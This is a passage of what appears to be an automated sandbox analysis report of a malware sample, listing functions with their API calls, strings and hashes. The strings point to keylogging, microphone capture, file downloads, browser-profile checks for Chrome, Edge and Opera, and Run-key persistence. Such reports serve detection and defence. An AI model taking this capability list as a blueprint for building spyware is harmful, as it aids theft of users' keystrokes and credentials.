                                                        • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                                                        • Opcode Fuzzy Hash: 145f269d181a8435875c36411829170d0c63d951855ea4e88e6edb1186bb4574
                                                        • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                                                        Function 00416676 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Sleep.KERNEL32 ref: 0041667B
                                                        • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: DownloadFileSleep
                                                        • String ID: !D@
                                                        • API String ID: 1931167962-604454484
                                                        • Opcode ID: 55e5d64e7b98f77c9516b1aa3147275b9d54505b18039c208d99df416d007d74
                                                        • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                                                        • Opcode Fuzzy Hash: 55e5d64e7b98f77c9516b1aa3147275b9d54505b18039c208d99df416d007d74
                                                        • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                                        Function 0041ADA8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExistsFilePath
                                                        • String ID: alarm.wav$hYG
                                                        • API String ID: 1174141254-2782910960
                                                        • Opcode ID: b1264f66081e357ea998da1c4a3710e4054d322a9d90202bb867bf05cfcdbcb2
                                                        • Instruction ID: 4122455f09fb97d0238bc6f6df8f07100adf7eded08faacdf9dae369850c3b42
                                                        • Opcode Fuzzy Hash: b1264f66081e357ea998da1c4a3710e4054d322a9d90202bb867bf05cfcdbcb2
                                                        • Instruction Fuzzy Hash: 6401B57078831156CA04F77688166EE77959B80718F00847FF64A162E2EFBC9E59C6CF
                                                        Function 0040B08C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                                          • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                          • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                        • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                                        • UnhookWindowsHookEx.USER32 ref: 0040B102
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                        • String ID: Online Keylogger Stopped
                                                        • API String ID: 1623830855-1496645233
                                                        • Opcode ID: d2011962e6819f9b37a51f0e1cf8c7d5879c21619fea64d9aec53d325501bd1f
                                                        • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                                        • Opcode Fuzzy Hash: d2011962e6819f9b37a51f0e1cf8c7d5879c21619fea64d9aec53d325501bd1f
                                                        • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                                        Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • waveInPrepareHeader.WINMM(?,00000020,?), ref: 00401849
                                                        • waveInAddBuffer.WINMM(?,00000020), ref: 0040185F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: wave$BufferHeaderPrepare
                                                        • String ID: XMG
                                                        • API String ID: 2315374483-813777761
                                                        • Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                                        • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                        • Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                                        • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                        Function 00448B66 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LocaleValid
                                                        • String ID: IsValidLocaleName$kKD
                                                        • API String ID: 1901932003-3269126172
                                                        • Opcode ID: b05ba58df44c2c66b42ef461d2c50a3a06673ca4252b594ddfa2bf91d99e166c
                                                        • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                                        • Opcode Fuzzy Hash: b05ba58df44c2c66b42ef461d2c50a3a06673ca4252b594ddfa2bf91d99e166c
                                                        • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                                        Function 0040C4FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExistsFilePath
                                                        • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                        • API String ID: 1174141254-4188645398
                                                        • Opcode ID: 436aaf2f4919e8db7ac4fc258f207b39b4a1c8f6fc7c84df28bf50f08fcb3653
                                                        • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                                        • Opcode Fuzzy Hash: 436aaf2f4919e8db7ac4fc258f207b39b4a1c8f6fc7c84df28bf50f08fcb3653
                                                        • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                                        Function 0040C561 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExistsFilePath
                                                        • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                        • API String ID: 1174141254-2800177040
                                                        • Opcode ID: 08b04822ed6971428f4ee0f1b5576531b1655caf3e2843dc1830a10d440ec58d
                                                        • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                                        • Opcode Fuzzy Hash: 08b04822ed6971428f4ee0f1b5576531b1655caf3e2843dc1830a10d440ec58d
                                                        • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                                        Function 0040C5C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5F7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExistsFilePath
                                                        • String ID: AppData$\Opera Software\Opera Stable\
                                                        • API String ID: 1174141254-1629609700
                                                        • Opcode ID: 9b1d6074b97f50ec4858c5e648a4d0042a555a00805eb6ed81dbd0ba111bcdaf
                                                        • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                                        • Opcode Fuzzy Hash: 9b1d6074b97f50ec4858c5e648a4d0042a555a00805eb6ed81dbd0ba111bcdaf
                                                        • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                                        Function 0040B681 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetKeyState.USER32(00000011), ref: 0040B686
                                                          • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
                                                          • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                          • Part of subcall function 0040A41B: GetKeyboardLayout.USER32 ref: 0040A464
                                                          • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                          • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
                                                          • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A49C
                                                          • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A4FC
                                                          • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                        • String ID: [AltL]$[AltR]
                                                        • API String ID: 2738857842-2658077756
                                                        • Opcode ID: 973633859d93ff8360b83ac9e1d77558cdb0b7c4d5bdbb5f5e50dc46d20ac961
                                                        • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                                        • Opcode Fuzzy Hash: 973633859d93ff8360b83ac9e1d77558cdb0b7c4d5bdbb5f5e50dc46d20ac961
                                                        • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                                        Function 004489D7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Time$FileSystem
                                                        • String ID: GetSystemTimePreciseAsFileTime$PkGNG
                                                        • API String ID: 2086374402-949981407
                                                        • Opcode ID: 67c6cfd282551a1661be117684b46016d00bd60ab82fcb0a51b6389df98130eb
                                                        • Instruction ID: bacba389ed7ed90706db716b221aab5ed2509560655679cc0f09f15d90276a03
                                                        • Opcode Fuzzy Hash: 67c6cfd282551a1661be117684b46016d00bd60ab82fcb0a51b6389df98130eb
                                                        • Instruction Fuzzy Hash: 79E0E531A81618FBD7116B25EC02E7EBB50DB08B02B10027FFC05A7292EE754D14D6DE
                                                        Function 004161C5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExecuteShell
                                                        • String ID: !D@$open
                                                        • API String ID: 587946157-1586967515
                                                        • Opcode ID: 30a1d241cab23d886832e5a2cf84020a5ff996eade7e739dca91f4d882a6cfc9
                                                        • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                                        • Opcode Fuzzy Hash: 30a1d241cab23d886832e5a2cf84020a5ff996eade7e739dca91f4d882a6cfc9
                                                        • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                                        Function 004555CB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • ___initconout.LIBCMT ref: 004555DB
                                                          • Part of subcall function 00456B9D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00456BB0
                                                        • WriteConsoleW.KERNEL32 ref: 004555FE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ConsoleCreateFileWrite___initconout
                                                        • String ID: PkGNG
                                                        • API String ID: 3087715906-263838557
                                                        • Opcode ID: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                                        • Instruction ID: 53f4b2898eb153bde3bf118a85e4039abf363423ff24ad7888d91dc13aa78fd6
                                                        • Opcode Fuzzy Hash: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                                        • Instruction Fuzzy Hash: C5E0EDB0100548BBDA208B69DC29EBA3328EB00331F500369FE29C62D2EB34EC44C769
                                                        Function 0040B6DB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: State
                                                        • String ID: [CtrlL]$[CtrlR]
                                                        • API String ID: 1649606143-2446555240
                                                        • Opcode ID: 1321bbb6cc8174ef42da852326f734558715e41d50b56193fb2d1a3bfc871e5f
                                                        • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                                        • Opcode Fuzzy Hash: 1321bbb6cc8174ef42da852326f734558715e41d50b56193fb2d1a3bfc871e5f
                                                        • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                                        Function 0040E7DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                        • __Init_thread_footer.LIBCMT ref: 00410F64
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Init_thread_footer__onexit
                                                        • String ID: ,kG$0kG
                                                        • API String ID: 1881088180-2015055088
                                                        • Opcode ID: 9b05eae692bf82ff893255be440f7f21efe509fead0387458dc7709882e6db21
                                                        • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                                                        • Opcode Fuzzy Hash: 9b05eae692bf82ff893255be440f7f21efe509fead0387458dc7709882e6db21
                                                        • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
                                                        Function 00413A5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: DeleteOpenValue
                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                        • API String ID: 2654517830-1051519024
                                                        • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                        • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                                        • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                        • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                                        Function 00440CE1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                                        • GetLastError.KERNEL32 ref: 00440D85
                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                        • String ID:
                                                        • API String ID: 1717984340-0
                                                        • Opcode ID: aa9c90e467390f2e0f6591fe7c9965b03d9b59885bed7a4237b1e33e934d31eb
                                                        • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                                        • Opcode Fuzzy Hash: aa9c90e467390f2e0f6591fe7c9965b03d9b59885bed7a4237b1e33e934d31eb
                                                        • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                                        Function 00411B9A Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411F2B), ref: 00411BC7
                                                        • IsBadReadPtr.KERNEL32(?,00000014,00411F2B), ref: 00411C93
                                                        • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411CB5
                                                        • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLastRead
                                                        • String ID:
                                                        • API String ID: 4100373531-0
                                                        • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                        • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                                        • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                        • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99